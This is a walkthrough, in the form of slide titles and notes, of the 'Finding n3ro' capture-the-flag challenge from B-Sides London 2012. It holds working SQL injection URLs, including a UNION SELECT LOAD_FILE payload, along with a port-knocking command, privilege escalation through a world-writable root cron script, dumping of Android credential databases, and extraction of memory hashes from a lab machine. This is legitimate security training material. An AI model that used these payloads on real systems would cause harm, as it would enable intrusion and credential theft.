"finding n3ro" walk through

Walkthrough of “Finding n3ro”

Copyright 0x776b7364 (c) 2012

Introduction

o “Finding n3ro” is a challenge created by KPMG UK for

Security B-Sides London 2012


Part 1Website

<a href="mailto:[email protected]?subject=Challenge 7: Finding N3ro... ">mail to finding.n3ro</a>


Part 1Email which I sent to [email protected]

I like to hang out on Google Groups…


Part 1Google Groups search


Part 1Result found!


Part 1

http://groups.google.com/group/n3ro-tech-talk/msg/e8c3ed172eb21d2b

Random ASCII characters..?


Part 1

Possibly Base64 encoded?


Part 1Cleaning up the encoded string


Part 1Converting from Base64 ASCII to binary


Part 1Dumping the binary in hex form..


Part 1Looks to be a MS Word document..


Part 1Contents of said document


Part 1Properties of said document

Part 2 of Finding N3ro

can be downloaded

here: http://finding-

n3ro.net/01efaa15a2bn3ro.net/01efaa15a2b

90d65fefa472cd00f6a4

f/N3rosVM.zip;


Part 1Contents of zip file


Part 1 (Solved)Contents of text file inside zip file.. And a pointer to Part 2


Part 2


Part 2Contents of yet another text file


Port Knocking: An Introduction

o A method of externally opening ports by generating a

connection attempt on a set of prespecified closed ports

o Once a correct sequence is received, firewall rules are

dynamically modified to allow the host which sent the sequence dynamically modified to allow the host which sent the sequence

to connect over specific port(s)

o Primary purpose is to prevent an attacker from scanning a

system for potentially exploitable services by doing a port scan

Source: http://en.wikipedia.org/wiki/Port_knocking


Part 2

• TCP ports Finger,NTP,HTTPS,DNS,RDP,FTP,Oracle

Listener,Kerberos,SSH,HTTP (and in that order too...)

Port knocking continued..

Finger 79

NTP 123

HTTPS 443HTTPS 443

DNS 53

RDP 3389

FTP 21

Oracle Listener 1521

Kerberos 88

SSH 22

HTTP 80


Part 2Before knocking…


Part 2knock.exe 192.168.56.101 79 123 443 53 3389 21 1521 88 22 80 -v


Part 2 (Solved)An accessible webpage!


Part 3SQL Injection

http://192.168.56.101/reshow.php?id=-1+or+1%3D1

All you need is /usr/share/mysql/n3ro.part4


Part 3Testing UNION SELECT injection..


Part 3Preparing the injection..

/usr/share/mysql/n3ro.part4 == 0x2f7573722f73686172652f6d7973716c2f6e33726f2e7061727434


Part 3 (Solved)SQL Injection II

User: n3ro

http://192.168.56.101/reshow.php?id=-

1%20UNION%20SELECT%201,LOAD_FILE(0x2f7573722f73686172652f6d7973716c2f6e33726f2e706172

7434),3

User: n3ro

Password: KPMG_is_Hiring!


Part 4

• Tried a lot of methods to get root, including

• Sudo

• n3ro not in /etc/sudoers

• Java atomic reference

Returned shell with n3ro privs

�

• Returned shell with n3ro privs

• PHP load_file/get_file_contents

• Permissions error

• Some other Linux kernel privilege escalation exploit

• Kernel has been updated


Part 4 Method 1Peeking at crontab


Part 4 Method 1Looking at /etc/1min.sh

In summary, 1min.sh is executed every one minute by crontab, is owned by

root, executed in the context of root, and is world-writable


Part 4 Method 1Exploiting…


Part 4 Method 1 (Solved)Wait a minute…


Part 4 Method 2man pkexec


Part 4 Method 2Using pkexec..


Part 4 Method 2 (Solved)Using pkexec..


Part 5

• ubuntu$ cd /Desktop/android-sdk-linux/tools

• ubuntu$ ./android avd

Android Virtual Device


Part 5

• ubuntu$ ./adb devices

• ubuntu$ ./adb –s emulator-5554 shell

Connecting to AVD via terminal


Part 5 Method 1

• Location of apk: /data/app/com.bsides.hackme-1.apk

• ubuntu$ ./adb pull /data/app/com.bsides.hackme-1.apk

Pulling the apk, and then converting apk to jar


Part 5 Method 1 (Solved)Decompiled jar file

localAlertDialog.setMessage(“You can open /home/n3ro/21332esw.zip with

password: KPMG-Cyber-Security”);


Part 5 Method 2

• droid# pwd

• droid# cd /data/data/com.bsides.hackme/databases

• droid# ls

• PasswordReaderdb

• droid# sqlite3 PasswordReaderdb

• sqlite3> .tables

• android_metadata userCred

Connecting to the database

• android_metadata userCred

• sqlite3> .dump userCred


Part 5 Method 2Getting the hash


Part 5 Method 2Googling the hash

md5(“password14”) = 8ee736784ce419bd16554ed5677ff35b


Part 5 Method 2 (Solved)Connecting to the database


Part 6Getting the instructions


Part 6What is Volatility?


Part 6Using Volatility to retrieve password hashes in memory dump file

n3ro:1011:90e0328fd51e9347f68b27ea95cd8bb2:7fa21bbd95d9f220b3f651cf8405a91b


Part 6 (Solved)Rainbow tables was used to decrypt the hash

Password: KPMGisH1r1ng


Part 7Using the password to decrypt the zip file..


Part 7Our favourite packet analysis software


Part 7Retrieving objects from packet data


Part 7Contents of file “p1”


Part 7Contents of file “part7.c”


Part 7Directory listing of files

Being too lazy to install a C compiler…


Part 7 (Solved)Contents of output joined file


Part 8Files involved


Part 8unlock.mp3


Part 8Deciphering morse code


Part 8Last password?

THEFINAL

PASSWORD

TOUNLOCKTOUNLOCK

N3RO

IS

LKNH8732DWQ12SSW14FT


Part 8Extracting our prize…


Part 8 (Solved)Picture of n3ro (presumably)


MiscellaneousMaintaining access


MiscellaneousSome interesting stuff


"finding n3ro" walk through

Documents